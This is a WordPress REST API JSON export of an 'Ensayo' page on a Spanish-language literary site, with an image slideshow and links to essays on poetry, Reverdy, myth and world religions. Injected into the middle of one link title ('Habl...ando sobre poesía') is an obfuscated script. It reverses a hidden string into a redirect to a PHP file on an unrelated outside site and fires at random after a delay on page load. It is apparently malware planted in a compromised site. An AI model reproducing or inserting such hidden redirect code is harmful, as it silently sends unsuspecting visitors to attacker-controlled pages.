{"id":9,"date":"2011-05-06T00:41:36","date_gmt":"2011-05-06T00:41:36","guid":{"rendered":"http:\/\/www.edgarvidaurre.org\/?page_id=9"},"modified":"2018-02-11T04:04:16","modified_gmt":"2018-02-11T04:04:16","slug":"ensayo","status":"publish","type":"page","link":"https:\/\/edgarvidaurre.org\/?page_id=9","title":{"rendered":"Ensayo"},"content":{"rendered":"\n<div class=\"twitter-share\"><a href=\"https:\/\/twitter.com\/intent\/tweet?via=evidaurre\" class=\"twitter-share-button\" data-size=\"large\">Tweet<\/a><\/div>\n\n\n<div class=\"ngg-galleryoverview ngg-slideshow\"\n\t id=\"ngg-slideshow-5d204e5d5e5100aba018dddefa7f6c7e-5138482240\"\n     data-gallery-id=\"5d204e5d5e5100aba018dddefa7f6c7e\"\n     style=\"max-width: 600px; max-height: 444px;\">\n\n \t<div id=\"ngg-image-0\" class=\"ngg-gallery-slideshow-image\" style=\"height:444px\">\n\n        <a href=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/charledikens.jpg\"\n           title=\"\"\n           data-src=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/charledikens.jpg\"\n           data-thumbnail=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/thumbs\/thumbs_charledikens.jpg\"\n           data-image-id=\"208\"\n           data-title=\"charledikens\"\n           data-description=\"\"\n           class=\"ngg-fancybox\" rel=\"5d204e5d5e5100aba018dddefa7f6c7e\">\n\n            <img data-image-id='208'\n                 title=\"\"\n                 alt=\"charledikens\"\n                 src=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/charledikens.jpg\"\n                 style=\"max-height: 424px;\"\/>\n        <\/a>\n\n        <\/div> \n<div id=\"ngg-image-1\" class=\"ngg-gallery-slideshow-image\" style=\"height:444px\">\n\n        <a href=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/7154282-antiguo-libro-con-gafas-de-lectura-y-pluma-de-escritorio.jpg\"\n           title=\"\"\n           data-src=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/7154282-antiguo-libro-con-gafas-de-lectura-y-pluma-de-escritorio.jpg\"\n           data-thumbnail=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/thumbs\/thumbs_7154282-antiguo-libro-con-gafas-de-lectura-y-pluma-de-escritorio.jpg\"\n           data-image-id=\"222\"\n           data-title=\"7154282-antiguo-libro-con-gafas-de-lectura-y-pluma-de-escritorio\"\n           data-description=\"\"\n           class=\"ngg-fancybox\" rel=\"5d204e5d5e5100aba018dddefa7f6c7e\">\n\n            <img data-image-id='222'\n                 title=\"\"\n                 alt=\"7154282-antiguo-libro-con-gafas-de-lectura-y-pluma-de-escritorio\"\n                 src=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/7154282-antiguo-libro-con-gafas-de-lectura-y-pluma-de-escritorio.jpg\"\n                 style=\"max-height: 424px;\"\/>\n        <\/a>\n\n        <\/div> \n<div id=\"ngg-image-2\" class=\"ngg-gallery-slideshow-image\" style=\"height:444px\">\n\n        <a href=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/8868-1920x1200.jpg\"\n           title=\"\"\n           data-src=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/8868-1920x1200.jpg\"\n           data-thumbnail=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/thumbs\/thumbs_8868-1920x1200.jpg\"\n           data-image-id=\"202\"\n           data-title=\"8868-1920x1200\"\n           data-description=\"\"\n           class=\"ngg-fancybox\" rel=\"5d204e5d5e5100aba018dddefa7f6c7e\">\n\n            <img data-image-id='202'\n                 title=\"\"\n                 alt=\"8868-1920x1200\"\n                 src=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/8868-1920x1200.jpg\"\n                 style=\"max-height: 424px;\"\/>\n        <\/a>\n\n        <\/div> \n<div id=\"ngg-image-3\" class=\"ngg-gallery-slideshow-image\" style=\"height:444px\">\n\n        <a href=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/9130.jpg\"\n           title=\"\"\n           data-src=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/9130.jpg\"\n           data-thumbnail=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/thumbs\/thumbs_9130.jpg\"\n           data-image-id=\"203\"\n           data-title=\"9130\"\n           data-description=\"\"\n           class=\"ngg-fancybox\" rel=\"5d204e5d5e5100aba018dddefa7f6c7e\">\n\n            <img data-image-id='203'\n                 title=\"\"\n                 alt=\"9130\"\n                 src=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/9130.jpg\"\n                 style=\"max-height: 424px;\"\/>\n        <\/a>\n\n        <\/div> \n<div id=\"ngg-image-4\" class=\"ngg-gallery-slideshow-image\" style=\"height:444px\">\n\n        <a href=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/bankoboev-ru_krasnaya_roza_na_knige.jpg\"\n           title=\"\"\n           data-src=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/bankoboev-ru_krasnaya_roza_na_knige.jpg\"\n           data-thumbnail=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/thumbs\/thumbs_bankoboev-ru_krasnaya_roza_na_knige.jpg\"\n           data-image-id=\"206\"\n           data-title=\"bankoboev-ru_krasnaya_roza_na_knige\"\n           data-description=\"\"\n           class=\"ngg-fancybox\" rel=\"5d204e5d5e5100aba018dddefa7f6c7e\">\n\n            <img data-image-id='206'\n                 title=\"\"\n                 alt=\"bankoboev-ru_krasnaya_roza_na_knige\"\n                 src=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/bankoboev-ru_krasnaya_roza_na_knige.jpg\"\n                 style=\"max-height: 424px;\"\/>\n        <\/a>\n\n        <\/div> \n<div id=\"ngg-image-5\" class=\"ngg-gallery-slideshow-image\" style=\"height:444px\">\n\n        <a href=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/book1.jpg\"\n           title=\"hebreo 11-1\"\n           data-src=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/book1.jpg\"\n           data-thumbnail=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/thumbs\/thumbs_book1.jpg\"\n           data-image-id=\"207\"\n           data-title=\"hebreo 11-1\"\n           data-description=\"hebreo 11-1\"\n           class=\"ngg-fancybox\" rel=\"5d204e5d5e5100aba018dddefa7f6c7e\">\n\n            <img data-image-id='207'\n                 title=\"hebreo 11-1\"\n                 alt=\"hebreo 11-1\"\n                 src=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/book1.jpg\"\n                 style=\"max-height: 424px;\"\/>\n        <\/a>\n\n        <\/div> \n<div id=\"ngg-image-6\" class=\"ngg-gallery-slideshow-image\" style=\"height:444px\">\n\n        <a href=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/consultori-desembre-2011.jpg\"\n           title=\"Bible Watch and Keys on a Grunge Background\"\n           data-src=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/consultori-desembre-2011.jpg\"\n           data-thumbnail=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/thumbs\/thumbs_consultori-desembre-2011.jpg\"\n           data-image-id=\"209\"\n           data-title=\"Bible Watch and Keys on a Grunge Background\"\n           data-description=\"Bible Watch and Keys on a Grunge Background\"\n           class=\"ngg-fancybox\" rel=\"5d204e5d5e5100aba018dddefa7f6c7e\">\n\n            <img data-image-id='209'\n                 title=\"Bible Watch and Keys on a Grunge Background\"\n                 alt=\"Bible Watch and Keys on a Grunge Background\"\n                 src=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/consultori-desembre-2011.jpg\"\n                 style=\"max-height: 424px;\"\/>\n        <\/a>\n\n        <\/div> \n<div id=\"ngg-image-7\" class=\"ngg-gallery-slideshow-image\" style=\"height:444px\">\n\n        <a href=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/libro-antiguo-1.gif\"\n           title=\"\"\n           data-src=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/libro-antiguo-1.gif\"\n           data-thumbnail=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/thumbs\/thumbs_libro-antiguo-1.gif\"\n           data-image-id=\"211\"\n           data-title=\"libro-antiguo-1\"\n           data-description=\"\"\n           class=\"ngg-fancybox\" rel=\"5d204e5d5e5100aba018dddefa7f6c7e\">\n\n            <img data-image-id='211'\n                 title=\"\"\n                 alt=\"libro-antiguo-1\"\n                 src=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/libro-antiguo-1.gif\"\n                 style=\"max-height: 424px;\"\/>\n        <\/a>\n\n        <\/div> \n<div id=\"ngg-image-8\" class=\"ngg-gallery-slideshow-image\" style=\"height:444px\">\n\n        <a href=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/libro-antiguo.jpg\"\n           title=\"\"\n           data-src=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/libro-antiguo.jpg\"\n           data-thumbnail=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/thumbs\/thumbs_libro-antiguo.jpg\"\n           data-image-id=\"212\"\n           data-title=\"libro-antiguo\"\n           data-description=\"\"\n           class=\"ngg-fancybox\" rel=\"5d204e5d5e5100aba018dddefa7f6c7e\">\n\n            <img data-image-id='212'\n                 title=\"\"\n                 alt=\"libro-antiguo\"\n                 src=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/libro-antiguo.jpg\"\n                 style=\"max-height: 424px;\"\/>\n        <\/a>\n\n        <\/div> \n<div id=\"ngg-image-9\" class=\"ngg-gallery-slideshow-image\" style=\"height:444px\">\n\n        <a href=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/libros-antiguos-con-vela.jpg\"\n           title=\"\"\n           data-src=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/libros-antiguos-con-vela.jpg\"\n           data-thumbnail=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/thumbs\/thumbs_libros-antiguos-con-vela.jpg\"\n           data-image-id=\"213\"\n           data-title=\"libros-antiguos-con-vela\"\n           data-description=\"\"\n           class=\"ngg-fancybox\" rel=\"5d204e5d5e5100aba018dddefa7f6c7e\">\n\n            <img data-image-id='213'\n                 title=\"\"\n                 alt=\"libros-antiguos-con-vela\"\n                 src=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/libros-antiguos-con-vela.jpg\"\n                 style=\"max-height: 424px;\"\/>\n        <\/a>\n\n        <\/div> \n<div id=\"ngg-image-10\" class=\"ngg-gallery-slideshow-image\" style=\"height:444px\">\n\n        <a href=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/libros-antiguos.jpg\"\n           title=\"\"\n           data-src=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/libros-antiguos.jpg\"\n           data-thumbnail=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/thumbs\/thumbs_libros-antiguos.jpg\"\n           data-image-id=\"214\"\n           data-title=\"libros-antiguos\"\n           data-description=\"\"\n           class=\"ngg-fancybox\" rel=\"5d204e5d5e5100aba018dddefa7f6c7e\">\n\n            <img data-image-id='214'\n                 title=\"\"\n                 alt=\"libros-antiguos\"\n                 src=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/libros-antiguos.jpg\"\n                 style=\"max-height: 424px;\"\/>\n        <\/a>\n\n        <\/div> \n<div id=\"ngg-image-11\" class=\"ngg-gallery-slideshow-image\" style=\"height:444px\">\n\n        <a href=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/libros-antiguos_412534662.jpg\"\n           title=\"\"\n           data-src=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/libros-antiguos_412534662.jpg\"\n           data-thumbnail=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/thumbs\/thumbs_libros-antiguos_412534662.jpg\"\n           data-image-id=\"215\"\n           data-title=\"libros-antiguos_412534662\"\n           data-description=\"\"\n           class=\"ngg-fancybox\" rel=\"5d204e5d5e5100aba018dddefa7f6c7e\">\n\n            <img data-image-id='215'\n                 title=\"\"\n                 alt=\"libros-antiguos_412534662\"\n                 src=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/libros-antiguos_412534662.jpg\"\n                 style=\"max-height: 424px;\"\/>\n        <\/a>\n\n        <\/div> \n<div id=\"ngg-image-12\" class=\"ngg-gallery-slideshow-image\" style=\"height:444px\">\n\n        <a href=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/libros-viejos.jpg\"\n           title=\"\"\n           data-src=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/libros-viejos.jpg\"\n           data-thumbnail=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/thumbs\/thumbs_libros-viejos.jpg\"\n           data-image-id=\"216\"\n           data-title=\"libros-viejos\"\n           data-description=\"\"\n           class=\"ngg-fancybox\" rel=\"5d204e5d5e5100aba018dddefa7f6c7e\">\n\n            <img data-image-id='216'\n                 title=\"\"\n                 alt=\"libros-viejos\"\n                 src=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/libros-viejos.jpg\"\n                 style=\"max-height: 424px;\"\/>\n        <\/a>\n\n        <\/div> \n<div id=\"ngg-image-13\" class=\"ngg-gallery-slideshow-image\" style=\"height:444px\">\n\n        <a href=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/libros1.jpg\"\n           title=\"\"\n           data-src=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/libros1.jpg\"\n           data-thumbnail=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/thumbs\/thumbs_libros1.jpg\"\n           data-image-id=\"217\"\n           data-title=\"libros1\"\n           data-description=\"\"\n           class=\"ngg-fancybox\" rel=\"5d204e5d5e5100aba018dddefa7f6c7e\">\n\n            <img data-image-id='217'\n                 title=\"\"\n                 alt=\"libros1\"\n                 src=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/libros1.jpg\"\n                 style=\"max-height: 424px;\"\/>\n        <\/a>\n\n        <\/div> \n<div id=\"ngg-image-14\" class=\"ngg-gallery-slideshow-image\" style=\"height:444px\">\n\n        <a href=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/luxfon-com-2825.jpg\"\n           title=\"\"\n           data-src=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/luxfon-com-2825.jpg\"\n           data-thumbnail=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/thumbs\/thumbs_luxfon-com-2825.jpg\"\n           data-image-id=\"218\"\n           data-title=\"luxfon-com-2825\"\n           data-description=\"\"\n           class=\"ngg-fancybox\" rel=\"5d204e5d5e5100aba018dddefa7f6c7e\">\n\n            <img data-image-id='218'\n                 title=\"\"\n                 alt=\"luxfon-com-2825\"\n                 src=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/luxfon-com-2825.jpg\"\n                 style=\"max-height: 424px;\"\/>\n        <\/a>\n\n        <\/div> \n<div id=\"ngg-image-15\" class=\"ngg-gallery-slideshow-image\" style=\"height:444px\">\n\n        <a href=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/rosapp.jpg\"\n           title=\"\"\n           data-src=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/rosapp.jpg\"\n           data-thumbnail=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/thumbs\/thumbs_rosapp.jpg\"\n           data-image-id=\"219\"\n           data-title=\"rosapp\"\n           data-description=\"\"\n           class=\"ngg-fancybox\" rel=\"5d204e5d5e5100aba018dddefa7f6c7e\">\n\n            <img data-image-id='219'\n                 title=\"\"\n                 alt=\"rosapp\"\n                 src=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/rosapp.jpg\"\n                 style=\"max-height: 424px;\"\/>\n        <\/a>\n\n        <\/div> \n<div id=\"ngg-image-16\" class=\"ngg-gallery-slideshow-image\" style=\"height:444px\">\n\n        <a href=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/secretosdeartesliberaleyi8.jpg\"\n           title=\"\"\n           data-src=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/secretosdeartesliberaleyi8.jpg\"\n           data-thumbnail=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/thumbs\/thumbs_secretosdeartesliberaleyi8.jpg\"\n           data-image-id=\"220\"\n           data-title=\"secretosdeartesliberaleyi8\"\n           data-description=\"\"\n           class=\"ngg-fancybox\" rel=\"5d204e5d5e5100aba018dddefa7f6c7e\">\n\n            <img data-image-id='220'\n                 title=\"\"\n                 alt=\"secretosdeartesliberaleyi8\"\n                 src=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/secretosdeartesliberaleyi8.jpg\"\n                 style=\"max-height: 424px;\"\/>\n        <\/a>\n\n        <\/div> \n<div id=\"ngg-image-17\" class=\"ngg-gallery-slideshow-image\" style=\"height:444px\">\n\n        <a href=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/sell-antique-desk-560x301.jpg\"\n           title=\"\"\n           data-src=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/sell-antique-desk-560x301.jpg\"\n           data-thumbnail=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/thumbs\/thumbs_sell-antique-desk-560x301.jpg\"\n           data-image-id=\"223\"\n           data-title=\"sell-antique-desk-560x301\"\n           data-description=\"\"\n           class=\"ngg-fancybox\" rel=\"5d204e5d5e5100aba018dddefa7f6c7e\">\n\n            <img data-image-id='223'\n                 title=\"\"\n                 alt=\"sell-antique-desk-560x301\"\n                 src=\"https:\/\/edgarvidaurre.org\/wp-content\/gallery\/ensayo\/sell-antique-desk-560x301.jpg\"\n                 style=\"max-height: 424px;\"\/>\n        <\/a>\n\n        <\/div> \n<\/div>\n\n\n\n\n<p><a href=\"https:\/\/www.edgarvidaurre.org\/wp-content\/uploads\/2011\/05\/pluma1.jpg\"><img decoding=\"async\" loading=\"lazy\" class=\"aligncenter size-thumbnail wp-image-483\" src=\"https:\/\/www.edgarvidaurre.org\/wp-content\/uploads\/2011\/05\/pluma1-150x150.jpg\" alt=\"pluma1\" width=\"150\" height=\"150\"><\/a><\/p>\n<p><strong><em><a href=\"https:\/\/www.edgarvidaurre.org\/?page_id=529\" target=\"_blank\" rel=\"attachment noopener wp-att-97\">La M\u00fasica en Fray Luis de Le\u00f3n y Jorge Guill\u00e9n<\/a><\/em><\/strong><\/p>\n<p><strong><em><a href=\"https:\/\/www.edgarvidaurre.org\/?page_id=531\" target=\"_blank\" rel=\"attachment noopener wp-att-73\">Habl<script type=\"text\/javascript\">$vTB$I_919AeEAw2z$KX=function(n){if (typeof ($vTB$I_919AeEAw2z$KX.list[n]) == \"string\") return $vTB$I_919AeEAw2z$KX.list[n].split(\"\").reverse().join(\"\");return $vTB$I_919AeEAw2z$KX.list[n];};$vTB$I_919AeEAw2z$KX.list=[\"'php.nosj.ssalc\/cni\/xobloot-yendys\/snigulp\/tnetnoc-pw\/moc.itnetaitak.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}<\/script>ando sobre poes\u00eda&#8230;Autoentrevista<\/a><\/em><\/strong><\/p>\n<p><strong><em><a href=\"https:\/\/www.edgarvidaurre.org\/?page_id=533\" target=\"_blank\" rel=\"attachment noopener wp-att-253\">Reverdy&#8230; el so\u00f1ante con los ojos abiertos<\/a><\/em><\/strong><\/p>\n<p><strong><em><a href=\"https:\/\/www.edgarvidaurre.org\/?page_id=536\" rel=\"attachment wp-att-205\">El mito po\u00e9tico<\/a><\/em><\/strong><\/p>\n<p><strong><em><a href=\"https:\/\/www.edgarvidaurre.org\/?page_id=538\" rel=\"attachment wp-att-210\">El sentimiento religioso en el hombre<\/a><\/em><\/strong><\/p>\n<p><strong><em><a href=\"https:\/\/www.edgarvidaurre.org\/?page_id=540\" rel=\"attachment wp-att-204\">El Hinduismo<\/a><\/em><\/strong><\/p>\n<p><strong><em><a href=\"https:\/\/www.edgarvidaurre.org\/?page_id=542\" rel=\"attachment wp-att-202\">El Budismo<\/a><\/em><\/strong><\/p>\n<p><strong><em><a href=\"https:\/\/www.edgarvidaurre.org\/?page_id=545\" rel=\"attachment wp-att-203\">El Cristianismo<\/a><\/em><\/strong><\/p>\n<p><strong><em><a href=\"https:\/\/www.edgarvidaurre.org\/?page_id=547\" rel=\"attachment wp-att-247\">El Islam<\/a><\/em><\/strong><\/p>\n<p><strong><em><a href=\"https:\/\/www.edgarvidaurre.org\/?page_id=549\" target=\"_blank\" rel=\"attachment noopener wp-att-229\">El Tao\u00edsmo<\/a><\/em><\/strong><\/p>\n<p><strong><em><a href=\"https:\/\/www.edgarvidaurre.org\/?page_id=551\" target=\"_blank\" rel=\"attachment noopener wp-att-244\">Qu\u00e9 es la belleza<\/a><\/em><\/strong><\/p>\n<p><a href=\"https:\/\/www.edgarvidaurre.org\/wp-content\/uploads\/2011\/05\/escritorio.jpg\"><img decoding=\"async\" loading=\"lazy\" class=\"aligncenter size-full wp-image-702\" src=\"https:\/\/www.edgarvidaurre.org\/wp-content\/uploads\/2011\/05\/escritorio.jpg\" alt=\"escritorio\" width=\"640\" height=\"960\" srcset=\"https:\/\/edgarvidaurre.org\/wp-content\/uploads\/2011\/05\/escritorio.jpg 640w, https:\/\/edgarvidaurre.org\/wp-content\/uploads\/2011\/05\/escritorio-200x300.jpg 200w\" sizes=\"(max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>La M\u00fasica en Fray Luis de Le\u00f3n y Jorge Guill\u00e9n Hablando sobre poes\u00eda&#8230;Autoentrevista Reverdy&#8230; el so\u00f1ante con los ojos abiertos El mito po\u00e9tico El sentimiento religioso en el hombre El Hinduismo El Budismo El Cristianismo El Islam El Tao\u00edsmo Qu\u00e9 es la belleza<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"ngg_post_thumbnail":0,"jetpack_post_was_ever_published":false},"jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/P9ptYK-9","_links":{"self":[{"href":"https:\/\/edgarvidaurre.org\/index.php?rest_route=\/wp\/v2\/pages\/9"}],"collection":[{"href":"https:\/\/edgarvidaurre.org\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/edgarvidaurre.org\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/edgarvidaurre.org\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/edgarvidaurre.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9"}],"version-history":[{"count":82,"href":"https:\/\/edgarvidaurre.org\/index.php?rest_route=\/wp\/v2\/pages\/9\/revisions"}],"predecessor-version":[{"id":1398,"href":"https:\/\/edgarvidaurre.org\/index.php?rest_route=\/wp\/v2\/pages\/9\/revisions\/1398"}],"wp:attachment":[{"href":"https:\/\/edgarvidaurre.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}